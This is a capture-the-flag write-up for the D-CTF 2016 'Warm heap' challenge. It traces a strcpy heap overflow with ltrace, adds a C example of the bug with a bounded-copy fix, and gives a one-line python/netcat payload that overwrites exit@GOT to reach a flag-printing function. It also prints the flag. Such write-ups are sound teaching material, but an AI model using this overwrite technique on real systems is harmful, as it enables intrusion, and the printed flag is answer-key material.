D-CTF Quals 2016 - Warm heap [Exploit]
25 Sep 2016 - mphx2
- Competition: https://dctf.def.camp/
- Challenge Name: Warm heap
- Type: Exploitation
- Points: 100
Checking the protections of the provided binary (ELF x64) shows that only NX is enabled.
Running it and feeding a long string on the first input line causes a segmentation fault. Using ltrace,
it is possible to see exactly what is going on:
$ ltrace ./exp100.bin
__libc_start_main(0x4008a8, 1, 0x7ffdb143cf78, 0x4009c0 <unfinished ...>
...
fgets(AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"..., 4096, 0x7f4d857ba8e0) = 0x7ffdb143be80
strcpy(0x237a030, "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"...) = 0x237a030
fgets(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., 4096, 0x7f4d857ba8e0) = 0x7ffdb143be80
strcpy(0x4141464141304141, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"... <no return ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
As observed, with a 40-byte offset on the first line we control the first argument of the second strcpy(), the destination address, and with the second line we control its second argument, the data being copied. So let's plan the strategy.
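To make the bug concrete, here is an added C example (not code from the challenge binary or the writeup) showing why an unbounded strcpy() into a 40-byte inline buffer spills into the pointer stored right after it, beside a bounded copy that refuses over-long input instead. The struct layout is a hypothetical reconstruction from the 40-byte offset seen in the ltrace output, and the names strcpy_clobbers_dest and copy_bounded are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the heap object implied by the ltrace
 * output above: 40 bytes of inline storage followed by the pointer that the
 * second strcpy() uses as its destination. This is an assumption for
 * illustration, not a layout recovered from the binary. */
struct record {
    char data[40];
    char *dest;
};

/* The vulnerable pattern: an unbounded strcpy() of an fgets() line into
 * data[]. A line of 40 or more characters overwrites dest. Shown for
 * comparison only; it is never called below. */
void copy_unbounded(struct record *r, const char *line) {
    strcpy(r->data, line);          /* no length check at all */
}

/* Arithmetic behind the 40-byte offset: strcpy() writes strlen(line)+1
 * bytes (NUL included), so any line of 40+ characters reaches dest. */
int strcpy_clobbers_dest(size_t line_len) {
    return line_len + 1 > offsetof(struct record, dest);
}

/* Bounded replacement: copies only if the whole string, NUL included, fits
 * in data[]; otherwise refuses and leaves both fields untouched.
 * Returns 0 on success and -1 on over-long input. */
int copy_bounded(struct record *r, const char *line) {
    const char *nul = memchr(line, '\0', sizeof r->data);
    if (nul == NULL) {
        return -1;                  /* no terminator within 40 bytes: too long */
    }
    memcpy(r->data, line, (size_t)(nul - line) + 1);
    return 0;
}

int main(void) {
    struct record r;
    char sentinel = 0;
    char line[64];

    memset(&r, 0, sizeof r);
    r.dest = &sentinel;

    /* Constructed sample input: 47 'A's, longer than the buffer. */
    memset(line, 'A', 47);
    line[47] = '\0';

    printf("offset of dest: %zu bytes\n", offsetof(struct record, dest));
    printf("39-char line clobbers dest? %d\n", strcpy_clobbers_dest(39));
    printf("40-char line clobbers dest? %d\n", strcpy_clobbers_dest(40));
    printf("bounded copy of \"hello\": %d\n", copy_bounded(&r, "hello"));
    printf("bounded copy of 47 x 'A': %d (dest intact: %d)\n",
           copy_bounded(&r, line), r.dest == &sentinel);
    return 0;
}
```

The bounded version is the fix a reviewer would ask for: fgets() already caps the line at 4096 bytes, but that says nothing about the 40-byte destination, so the copy itself must check the length and fail loudly rather than silently rewrite the neighbouring pointer.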
While reversing it, it is possible to see that after the string copies are done the program calls exit() through its GOT entry at 0x601068, so if we overwrite that entry with an address of our choice, execution is redirected there.
During the binary inspection in IDA Pro, we can easily identify a function that prints the flag at 0x400826, as observed below:
So, we can overwrite the exit@GOT entry with the address of the print-flag function.
$ python -c 'print "A"*40 + "\x68\x10\x60\x00\x00\x00\x00\x00" + "\n" + "\x26\x08\x40\x00\x00"'| nc 10.13.37.21 13371
And the flag comes up:
DCTF{b94c21ff7531cba35a498cb074918b3e}